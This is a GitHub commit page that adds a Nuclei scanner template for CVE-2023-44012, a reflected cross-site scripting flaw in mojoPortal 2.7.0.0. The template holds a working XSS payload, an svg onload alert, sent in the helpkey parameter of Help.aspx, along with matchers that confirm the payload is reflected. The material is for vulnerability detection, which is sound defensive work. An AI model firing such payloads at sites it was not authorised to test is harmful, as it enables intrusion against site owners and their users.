Merge pull request #10220 from projectdiscovery/CVE-2023-44012

Create CVE-2023-44012.yaml
patch-5
Dhiyaneshwaran 2024-07-11 22:57:16 +05:30 committed by GitHub
commit 9c5e51ed09
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 44 additions and 0 deletions

View File

@ -0,0 +1,44 @@
id: CVE-2023-44012
info:
name: mojoPortal v.2.7.0.0 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
Cross Site Scripting vulnerability in mojoPortal v.2.7.0.0 allows a remote attacker to execute arbitrary code via the helpkey parameter in the Help.aspx component.
impact: |
Successful exploitation could allow an attacker to execute malicious scripts in the context of the victim's browser.
remediation: |
Upgrade to a patched version of mojoPortal to mitigate the Cross Site Scripting (XSS) vulnerability.
reference:
- https://github.com/Vietsunshine-Electronic-Solution-JSC/Vulnerability-Disclosures/tree/main/2023/CVE-2023-44012
- https://github.com/fkie-cad/nvd-json-data-feeds
- https://nvd.nist.gov/vuln/detail/CVE-2023-44012
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-44012
cwe-id: CWE-79
epss-score: 0.0009
epss-percentile: 0.37745
cpe: cpe:2.3:a:mojoportal:mojoportal:2.7.0.0:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: mojoportal
product: mojoportal
fofa-query: title="mojoPortal"
tags: cve,cve2023,mojoportal,xss
http:
- method: GET
path:
- "{{BaseURL}}/Help.aspx?helpkey=xxxxxxx'><svg/onload=alert()+x="
matchers:
- type: dsl
dsl:
- 'contains_any(body, "mojoPortal", "mojo-accordion", "mojo-tabs")'
- 'contains(body, "><svg/onload=alert()")'
- 'contains(header, "text/html")'
- 'status_code == 200'
condition: and